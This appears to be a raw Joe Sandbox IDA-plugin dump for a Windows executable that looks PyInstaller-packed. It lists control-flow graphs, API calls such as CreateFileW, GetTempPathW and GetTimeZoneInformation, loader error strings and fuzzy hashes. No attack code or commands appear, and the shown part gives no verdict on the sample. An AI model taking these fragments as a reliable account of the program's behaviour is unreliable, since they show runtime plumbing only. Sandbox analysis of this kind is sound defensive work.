14775->14763 14775->14766 14776->14775 14778 7ff7a674a89a FlsSetValue 14777->14778 14779 7ff7a674a87f FlsGetValue 14777->14779 14780 7ff7a674a8a7 14778->14780 14782 7ff7a6749a73 SetLastError 14778->14782 14781 7ff7a674a894 14779->14781 14779->14782 14794 7ff7a674dd40 14780->14794 14781->14778 14782->14770 14785 7ff7a674a8d4 FlsSetValue 14788 7ff7a674a8e0 FlsSetValue 14785->14788 14789 7ff7a674a8f2 14785->14789 14786 7ff7a674a8c4 FlsSetValue 14787 7ff7a674a8cd 14786->14787 14801 7ff7a6749e18 14787->14801 14788->14787 14807 7ff7a674a3c4 14789->14807 14799 7ff7a674dd51 _get_daylight 14794->14799 14795 7ff7a674dda2 14798 7ff7a6744444 _get_daylight 10 API calls 14795->14798 14796 7ff7a674dd86 HeapAlloc 14797 7ff7a674a8b6 14796->14797 14796->14799 14797->14785 14797->14786 14798->14797 14799->14795 14799->14796 14812 7ff7a67526b0 14799->14812 14802 7ff7a6749e1d RtlFreeHeap 14801->14802 14803 7ff7a6749e4c 14801->14803 14802->14803 14804 7ff7a6749e38 GetLastError 14802->14804 14803->14782 14805 7ff7a6749e45 __free_lconv_mon 14804->14805 14806 7ff7a6744444 _get_daylight 9 API calls 14805->14806 14806->14803 14821 7ff7a674a29c 14807->14821 14815 7ff7a67526f0 14812->14815 14820 7ff7a674f788 EnterCriticalSection 14815->14820 14833 7ff7a674f788 EnterCriticalSection 14821->14833 14837 7ff7a674a7d9 FlsSetValue 14836->14837 14841 7ff7a674a7bc 14836->14841 14838 7ff7a674a7eb 14837->14838 14850 7ff7a674a7c9 14837->14850 14840 7ff7a674dd40 _get_daylight 5 API calls 14838->14840 14839 7ff7a674a845 SetLastError 14839->14739 14842 7ff7a674a7fa 14840->14842 14841->14837 14841->14850 14843 7ff7a674a818 FlsSetValue 14842->14843 14844 7ff7a674a808 FlsSetValue 14842->14844 14846 7ff7a674a824 FlsSetValue 14843->14846 14847 7ff7a674a836 14843->14847 14845 7ff7a674a811 14844->14845 14848 7ff7a6749e18 __free_lconv_mon 5 API calls 14845->14848 14846->14845 14849 7ff7a674a3c4 _get_daylight 5 API calls 14847->14849 14848->14850 14851 7ff7a674a83e 14849->14851 14850->14839 14852 7ff7a6749e18 
__free_lconv_mon 5 API calls 14851->14852 14852->14839 14854 7ff7a673b04e RtlLookupFunctionEntry 14853->14854 14855 7ff7a673ae6b 14854->14855 14856 7ff7a673b064 RtlVirtualUnwind 14854->14856 14857 7ff7a673ae00 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14855->14857 14856->14854 14856->14855 14859 7ff7a6749b1e _wfindfirst32i64 __scrt_get_show_window_mode 14858->14859 14860 7ff7a6749b46 RtlCaptureContext RtlLookupFunctionEntry 14859->14860 14861 7ff7a6749bb6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14860->14861 14862 7ff7a6749b80 RtlVirtualUnwind 14860->14862 14863 7ff7a6749c08 _wfindfirst32i64 14861->14863 14862->14861 14864 7ff7a673ad80 _wfindfirst32i64 8 API calls 14863->14864 14865 7ff7a6749c27 GetCurrentProcess TerminateProcess 14864->14865 18321 7ff7a67594de 18323 7ff7a67594ee 18321->18323 18325 7ff7a67442f8 LeaveCriticalSection 18323->18325 18984 7ff7a6759664 18987 7ff7a67442f8 LeaveCriticalSection 18984->18987 17735 7ff7a673a370 17736 7ff7a673a39e 17735->17736 17737 7ff7a673a385 17735->17737 17737->17736 17739 7ff7a674cacc 12 API calls 17737->17739 17738 7ff7a673a3fc 17739->17738 18334 7ff7a67507f0 18345 7ff7a6756764 18334->18345 18346 7ff7a6756771 18345->18346 18347 7ff7a6749e18 __free_lconv_mon 11 API calls 18346->18347 18348 7ff7a675678d 18346->18348 18347->18346 18349 7ff7a6749e18 __free_lconv_mon 11 API calls 18348->18349 18350 7ff7a67507f9 18348->18350 18349->18348 18351 7ff7a674f788 EnterCriticalSection 18350->18351 18352 7ff7a674b9f0 18363 7ff7a674f788 EnterCriticalSection 18352->18363 18378 7ff7a67596f9 18379 7ff7a6759708 18378->18379 18380 7ff7a6759712 18378->18380 18382 7ff7a674f7e8 LeaveCriticalSection 18379->18382 19314 7ff7a6744290 19315 7ff7a674429b 19314->19315 19323 7ff7a674e354 19315->19323 19336 7ff7a674f788 EnterCriticalSection 19323->19336 17740 7ff7a6746714 17741 7ff7a674677b 17740->17741 17742 7ff7a6746742 17740->17742 17741->17742 17744 7ff7a6746780 
FindFirstFileExW 17741->17744 17743 7ff7a6744444 _get_daylight 11 API calls 17742->17743 17745 7ff7a6746747 17743->17745 17746 7ff7a67467e9 17744->17746 17747 7ff7a67467a2 GetLastError 17744->17747 17748 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 17745->17748 17800 7ff7a6746984 17746->17800 17750 7ff7a67467d9 17747->17750 17751 7ff7a67467ad 17747->17751 17752 7ff7a6746752 17748->17752 17753 7ff7a6744444 _get_daylight 11 API calls 17750->17753 17751->17750 17756 7ff7a67467c9 17751->17756 17757 7ff7a67467b7 17751->17757 17759 7ff7a673ad80 _wfindfirst32i64 8 API calls 17752->17759 17753->17752 17755 7ff7a6746984 _wfindfirst32i64 10 API calls 17760 7ff7a674680f 17755->17760 17758 7ff7a6744444 _get_daylight 11 API calls 17756->17758 17757->17750 17761 7ff7a67467bc 17757->17761 17758->17752 17762 7ff7a6746766 17759->17762 17763 7ff7a6746984 _wfindfirst32i64 10 API calls 17760->17763 17764 7ff7a6744444 _get_daylight 11 API calls 17761->17764 17765 7ff7a674681d 17763->17765 17764->17752 17766 7ff7a674f924 _wfindfirst32i64 37 API calls 17765->17766 17767 7ff7a674683b 17766->17767 17767->17752 17768 7ff7a6746847 17767->17768 17769 7ff7a6749dd0 _wfindfirst32i64 17 API calls 17768->17769 17770 7ff7a674685b 17769->17770 17771 7ff7a6746885 17770->17771 17774 7ff7a67468c4 FindNextFileW 17770->17774 17772 7ff7a6744444 _get_daylight 11 API calls 17771->17772 17773 7ff7a674688a 17772->17773 17775 7ff7a6749db0 _invalid_parameter_noinfo 37 API calls 17773->17775 17776 7ff7a6746914 17774->17776 17777 7ff7a67468d3 GetLastError 17774->17777 17778 7ff7a6746895 17775->17778 17779 7ff7a6746984 _wfindfirst32i64 10 API calls 17776->17779 17780 7ff7a6746907 17777->17780 17781 7ff7a67468de 17777->17781 17786 7ff7a673ad80 _wfindfirst32i64 8 API calls 17778->17786 17783 7ff7a674692c 17779->17783 17782 7ff7a6744444 _get_daylight 11 API calls 17780->17782 17781->17780 17784 7ff7a67468fa 17781->17784 17785 7ff7a67468e8 17781->17785 17782->17778 17787 7ff7a6746984 _wfindfirst32i64 10 API 
calls 17783->17787 17789 7ff7a6744444 _get_daylight 11 API calls 17784->17789 17785->17780 17788 7ff7a67468ed 17785->17788 17790 7ff7a67468a8 17786->17790 17791 7ff7a674693a 17787->17791 17793 7ff7a6744444 _get_daylight 11 API calls 17788->17793 17789->17778 17792 7ff7a6746984 _wfindfirst32i64 10 API calls 17791->17792 17794 7ff7a6746948 17792->17794 17793->17778 17795 7ff7a674f924 _wfindfirst32i64 37 API calls 17794->17795 17796 7ff7a6746966 17795->17796 17796->17778 17797 7ff7a674696e 17796->17797 17798 7ff7a6749dd0 _wfindfirst32i64 17 API calls 17797->17798 17799 7ff7a6746982 17798->17799 17801 7ff7a674699c 17800->17801 17802 7ff7a67469a2 FileTimeToSystemTime 17800->17802 17801->17802 17804 7ff7a67469c7 17801->17804 17803 7ff7a67469b1 SystemTimeToTzSpecificLocalTime 17802->17803 17802->17804 17803->17804 17805 7ff7a673ad80 _wfindfirst32i64 8 API calls 17804->17805 17806 7ff7a6746801 17805->17806 17806->17755

Control-flow Graph

• Executed
• Not Executed
                                                                                                                        control_flow_graph 135 7ff7a6754e20-7ff7a6754e5b call 7ff7a67547a8 call 7ff7a67547b0 call 7ff7a6754818 142 7ff7a6755085-7ff7a67550d1 call 7ff7a6749dd0 call 7ff7a67547a8 call 7ff7a67547b0 call 7ff7a6754818 135->142 143 7ff7a6754e61-7ff7a6754e6c call 7ff7a67547b8 135->143 170 7ff7a67550d7-7ff7a67550e2 call 7ff7a67547b8 142->170 171 7ff7a675520f-7ff7a675527d call 7ff7a6749dd0 call 7ff7a67506b8 142->171 143->142 148 7ff7a6754e72-7ff7a6754e7c 143->148 151 7ff7a6754e9e-7ff7a6754ea2 148->151 152 7ff7a6754e7e-7ff7a6754e81 148->152 153 7ff7a6754ea5-7ff7a6754ead 151->153 155 7ff7a6754e84-7ff7a6754e8f 152->155 153->153 156 7ff7a6754eaf-7ff7a6754ec2 call 7ff7a674cacc 153->156 158 7ff7a6754e9a-7ff7a6754e9c 155->158 159 7ff7a6754e91-7ff7a6754e98 155->159 165 7ff7a6754eda-7ff7a6754ee6 call 7ff7a6749e18 156->165 166 7ff7a6754ec4-7ff7a6754ec6 call 7ff7a6749e18 156->166 158->151 162 7ff7a6754ecb-7ff7a6754ed9 158->162 159->155 159->158 177 7ff7a6754eed-7ff7a6754ef5 165->177 166->162 170->171 178 7ff7a67550e8-7ff7a67550f3 call 7ff7a67547e8 170->178 188 7ff7a675528b-7ff7a675528e 171->188 189 7ff7a675527f-7ff7a6755286 171->189 177->177 180 7ff7a6754ef7-7ff7a6754f08 call 7ff7a674f924 177->180 178->171 187 7ff7a67550f9-7ff7a675511c call 7ff7a6749e18 GetTimeZoneInformation 178->187 180->142 190 7ff7a6754f0e-7ff7a6754f64 call 7ff7a673c210 * 4 call 7ff7a6754d3c 180->190 206 7ff7a67551e4-7ff7a675520e call 7ff7a67547a0 call 7ff7a6754790 call 7ff7a6754798 187->206 207 7ff7a6755122-7ff7a6755143 187->207 194 7ff7a67552c5-7ff7a67552d8 call 7ff7a674cacc 188->194 195 7ff7a6755290 188->195 192 7ff7a675531b-7ff7a675531e 189->192 248 7ff7a6754f66-7ff7a6754f6a 190->248 196 7ff7a6755293 192->196 199 7ff7a6755324-7ff7a675532c call 7ff7a6754e20 192->199 210 7ff7a67552da 194->210 211 7ff7a67552e3-7ff7a67552fe call 7ff7a67506b8 194->211 195->196 203 7ff7a6755298-7ff7a67552c4 call 
7ff7a6749e18 call 7ff7a673ad80 196->203 204 7ff7a6755293 call 7ff7a675509c 196->204 199->203 204->203 212 7ff7a675514e-7ff7a6755155 207->212 213 7ff7a6755145-7ff7a675514b 207->213 217 7ff7a67552dc-7ff7a67552e1 call 7ff7a6749e18 210->217 234 7ff7a6755305-7ff7a6755317 call 7ff7a6749e18 211->234 235 7ff7a6755300-7ff7a6755303 211->235 218 7ff7a6755157-7ff7a675515f 212->218 219 7ff7a6755169 212->219 213->212 217->195 218->219 226 7ff7a6755161-7ff7a6755167 218->226 224 7ff7a675516b-7ff7a67551df call 7ff7a673c210 * 4 call 7ff7a6751c7c call 7ff7a6755334 * 2 219->224 224->206 226->224 234->192 235->217 250 7ff7a6754f6c 248->250 251 7ff7a6754f70-7ff7a6754f74 248->251 250->251 251->248 253 7ff7a6754f76-7ff7a6754f9b call 7ff7a6757c64 251->253 259 7ff7a6754f9e-7ff7a6754fa2 253->259 261 7ff7a6754fa4-7ff7a6754faf 259->261 262 7ff7a6754fb1-7ff7a6754fb5 259->262 261->262 263 7ff7a6754fb7-7ff7a6754fbb 261->263 262->259 265 7ff7a675503c-7ff7a6755040 263->265 266 7ff7a6754fbd-7ff7a6754fe5 call 7ff7a6757c64 263->266 268 7ff7a6755047-7ff7a6755054 265->268 269 7ff7a6755042-7ff7a6755044 265->269 275 7ff7a6754fe7 266->275 276 7ff7a6755003-7ff7a6755007 266->276 271 7ff7a6755056-7ff7a675506c call 7ff7a6754d3c 268->271 272 7ff7a675506f-7ff7a675507e call 7ff7a67547a0 call 7ff7a6754790 268->272 269->268 271->272 272->142 279 7ff7a6754fea-7ff7a6754ff1 275->279 276->265 281 7ff7a6755009-7ff7a6755027 call 7ff7a6757c64 276->281 279->276 282 7ff7a6754ff3-7ff7a6755001 279->282 287 7ff7a6755033-7ff7a675503a 281->287 282->276 282->279 287->265 288 7ff7a6755029-7ff7a675502d 287->288 288->265 289 7ff7a675502f 288->289 289->287
                                                                                                                        APIs
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A6754E65
                                                                                                                          • Part of subcall function 00007FF7A67547B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A67547CC
                                                                                                                          • Part of subcall function 00007FF7A6749E18: RtlFreeHeap.NTDLL(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E2E
                                                                                                                          • Part of subcall function 00007FF7A6749E18: GetLastError.KERNEL32(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E38
                                                                                                                          • Part of subcall function 00007FF7A6749DD0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7A6749DAF,?,?,?,?,?,00007FF7A67421EC), ref: 00007FF7A6749DD9
                                                                                                                          • Part of subcall function 00007FF7A6749DD0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7A6749DAF,?,?,?,?,?,00007FF7A67421EC), ref: 00007FF7A6749DFE
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A6754E54
                                                                                                                          • Part of subcall function 00007FF7A6754818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A675482C
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A67550CA
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A67550DB
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A67550EC
                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7A675532C), ref: 00007FF7A6755113
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                        • API String ID: 4070488512-239921721
                                                                                                                        • Opcode ID: 77ba2d10f7a40a17f98ee8fd01e8c058cff67636c36494bf754a44884999314e
                                                                                                                        • Instruction ID: 991424b52c8d9526e416483fb6d91dae79b80cf4206dfe0673a99327ff2d9423
                                                                                                                        • Opcode Fuzzy Hash: 77ba2d10f7a40a17f98ee8fd01e8c058cff67636c36494bf754a44884999314e
                                                                                                                        • Instruction Fuzzy Hash: 4ED1C426A2A25286E720FF25DD601BAA751FF4CF84FC64136DA0D476E9DF3CE4418760

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 320 7ff7a6755d6c-7ff7a6755ddf call 7ff7a6755aa0 323 7ff7a6755df9-7ff7a6755e03 call 7ff7a6746cfc 320->323 324 7ff7a6755de1-7ff7a6755dea call 7ff7a6744424 320->324 330 7ff7a6755e1e-7ff7a6755e87 CreateFileW 323->330 331 7ff7a6755e05-7ff7a6755e1c call 7ff7a6744424 call 7ff7a6744444 323->331 329 7ff7a6755ded-7ff7a6755df4 call 7ff7a6744444 324->329 344 7ff7a675613a-7ff7a675615a 329->344 334 7ff7a6755e89-7ff7a6755e8f 330->334 335 7ff7a6755f04-7ff7a6755f0f GetFileType 330->335 331->329 340 7ff7a6755ed1-7ff7a6755eff GetLastError call 7ff7a67443b8 334->340 341 7ff7a6755e91-7ff7a6755e95 334->341 337 7ff7a6755f11-7ff7a6755f4c GetLastError call 7ff7a67443b8 CloseHandle 335->337 338 7ff7a6755f62-7ff7a6755f69 335->338 337->329 355 7ff7a6755f52-7ff7a6755f5d call 7ff7a6744444 337->355 347 7ff7a6755f6b-7ff7a6755f6f 338->347 348 7ff7a6755f71-7ff7a6755f74 338->348 340->329 341->340 342 7ff7a6755e97-7ff7a6755ecf CreateFileW 341->342 342->335 342->340 352 7ff7a6755f7a-7ff7a6755fcf call 7ff7a6746c14 347->352 348->352 353 7ff7a6755f76 348->353 358 7ff7a6755fee-7ff7a675601f call 7ff7a6755820 352->358 359 7ff7a6755fd1-7ff7a6755fdd call 7ff7a6755ca8 352->359 353->352 355->329 366 7ff7a6756025-7ff7a6756067 358->366 367 7ff7a6756021-7ff7a6756023 358->367 359->358 365 7ff7a6755fdf 359->365 368 7ff7a6755fe1-7ff7a6755fe9 call 7ff7a6749f90 365->368 369 7ff7a6756089-7ff7a6756094 366->369 370 7ff7a6756069-7ff7a675606d 366->370 367->368 368->344 371 7ff7a6756138 369->371 372 7ff7a675609a-7ff7a675609e 369->372 370->369 374 7ff7a675606f-7ff7a6756084 370->374 371->344 372->371 375 7ff7a67560a4-7ff7a67560e9 CloseHandle CreateFileW 372->375 374->369 377 7ff7a67560eb-7ff7a6756119 GetLastError call 7ff7a67443b8 call 7ff7a6746e3c 375->377 378 7ff7a675611e-7ff7a6756133 375->378 377->378 378->371
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1617910340-0
                                                                                                                        • Opcode ID: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
                                                                                                                        • Instruction ID: 6dd26cdb7e460e011835fe7c626f5df598fff4f6454f1272e5b929b9974c18bc
                                                                                                                        • Opcode Fuzzy Hash: f9714f3a8e10acd42ca2d2c5b2c2c8a966f4ca54d5d677232d284773bb45134f
                                                                                                                        • Instruction Fuzzy Hash: 3DC1B032B35A4185EB10EF69C8A46AE7761FB48F98B820239DB1E577E9CF39D051C310

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetTempPathW.KERNEL32(?,00000000,?,00007FF7A673674D), ref: 00007FF7A673681A
                                                                                                                          • Part of subcall function 00007FF7A6736990: GetEnvironmentVariableW.KERNEL32(00007FF7A67336E7), ref: 00007FF7A67369CA
                                                                                                                          • Part of subcall function 00007FF7A6736990: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7A67369E7
                                                                                                                          • Part of subcall function 00007FF7A67466B4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A67466CD
                                                                                                                        • SetEnvironmentVariableW.KERNEL32(?,TokenIntegrityLevel), ref: 00007FF7A67368D1
                                                                                                                          • Part of subcall function 00007FF7A6732770: MessageBoxW.USER32 ref: 00007FF7A6732841
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
                                                                                                                        • String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
                                                                                                                        • API String ID: 3752271684-1116378104
                                                                                                                        • Opcode ID: e6afb0128859ccbf49ce8011b8d869e8e025b7611e3f9a50b4fcc1994f3a2000
                                                                                                                        • Instruction ID: 8db842b1c21dd6ee7dbbad3b4c2ae3f363a61c2737988c3768ff32986c2f6954
                                                                                                                        • Opcode Fuzzy Hash: e6afb0128859ccbf49ce8011b8d869e8e025b7611e3f9a50b4fcc1994f3a2000
                                                                                                                        • Instruction Fuzzy Hash: 84516C11B3E65240FA59BB629D396BBD2919F5EFC0FC64075DD0E477BAEE2CE4018220

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 799 7ff7a675509c-7ff7a67550d1 call 7ff7a67547a8 call 7ff7a67547b0 call 7ff7a6754818 806 7ff7a67550d7-7ff7a67550e2 call 7ff7a67547b8 799->806 807 7ff7a675520f-7ff7a675527d call 7ff7a6749dd0 call 7ff7a67506b8 799->807 806->807 812 7ff7a67550e8-7ff7a67550f3 call 7ff7a67547e8 806->812 819 7ff7a675528b-7ff7a675528e 807->819 820 7ff7a675527f-7ff7a6755286 807->820 812->807 818 7ff7a67550f9-7ff7a675511c call 7ff7a6749e18 GetTimeZoneInformation 812->818 833 7ff7a67551e4-7ff7a675520e call 7ff7a67547a0 call 7ff7a6754790 call 7ff7a6754798 818->833 834 7ff7a6755122-7ff7a6755143 818->834 823 7ff7a67552c5-7ff7a67552d8 call 7ff7a674cacc 819->823 824 7ff7a6755290 819->824 822 7ff7a675531b-7ff7a675531e 820->822 825 7ff7a6755293 822->825 828 7ff7a6755324-7ff7a675532c call 7ff7a6754e20 822->828 836 7ff7a67552da 823->836 837 7ff7a67552e3-7ff7a67552fe call 7ff7a67506b8 823->837 824->825 830 7ff7a6755298-7ff7a67552c4 call 7ff7a6749e18 call 7ff7a673ad80 825->830 831 7ff7a6755293 call 7ff7a675509c 825->831 828->830 831->830 838 7ff7a675514e-7ff7a6755155 834->838 839 7ff7a6755145-7ff7a675514b 834->839 842 7ff7a67552dc-7ff7a67552e1 call 7ff7a6749e18 836->842 857 7ff7a6755305-7ff7a6755317 call 7ff7a6749e18 837->857 858 7ff7a6755300-7ff7a6755303 837->858 843 7ff7a6755157-7ff7a675515f 838->843 844 7ff7a6755169 838->844 839->838 842->824 843->844 850 7ff7a6755161-7ff7a6755167 843->850 848 7ff7a675516b-7ff7a67551df call 7ff7a673c210 * 4 call 7ff7a6751c7c call 7ff7a6755334 * 2 844->848 848->833 850->848 857->822 858->842
                                                                                                                        APIs
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A67550CA
                                                                                                                          • Part of subcall function 00007FF7A6754818: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A675482C
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A67550DB
                                                                                                                          • Part of subcall function 00007FF7A67547B8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A67547CC
                                                                                                                        • _get_daylight.LIBCMT ref: 00007FF7A67550EC
                                                                                                                          • Part of subcall function 00007FF7A67547E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7A67547FC
                                                                                                                          • Part of subcall function 00007FF7A6749E18: RtlFreeHeap.NTDLL(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E2E
                                                                                                                          • Part of subcall function 00007FF7A6749E18: GetLastError.KERNEL32(?,?,?,00007FF7A6751E42,?,?,?,00007FF7A6751E7F,?,?,00000000,00007FF7A6752345,?,?,?,00007FF7A6752277), ref: 00007FF7A6749E38
                                                                                                                        • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7A675532C), ref: 00007FF7A6755113
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                        • API String ID: 3458911817-239921721
                                                                                                                        • Opcode ID: 74e2aae664cff904285b8cceaf5bd78e264b53cf78d1017760ee0a7f729cca6e
                                                                                                                        • Instruction ID: 5d05dc0d9c9e8aaef8a22c6994ec370e9cdea994302ff1c6e904aee9308ce24c
                                                                                                                        • Opcode Fuzzy Hash: 74e2aae664cff904285b8cceaf5bd78e264b53cf78d1017760ee0a7f729cca6e
                                                                                                                        • Instruction Fuzzy Hash: DE517232A2A64286E710FF31DDA11AAA760FB4CB84FC24135DA0D436B9DF3CE4018B60

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _fread_nolock$Message_invalid_parameter_noinfo
                                                                                                                        • String ID: Cannot read Table of Contents.$Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                        • API String ID: 2153230061-4158440160
                                                                                                                        • Opcode ID: 9107ab47c13acb47a45ab342f5a73b489a7db59ea1c1e3128dc2121c9b53a65e
                                                                                                                        • Instruction ID: 64fd012bc83e4d10c218bf0bacc92c6026c7e40b738ac7c3d49c78bbae6af8dd
                                                                                                                        • Opcode Fuzzy Hash: 9107ab47c13acb47a45ab342f5a73b489a7db59ea1c1e3128dc2121c9b53a65e
                                                                                                                        • Instruction Fuzzy Hash: 79516371A2BA4686EB58EF24D86017AB3A0EF4CF54B928135DA1D833A9DF7CE440C750

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
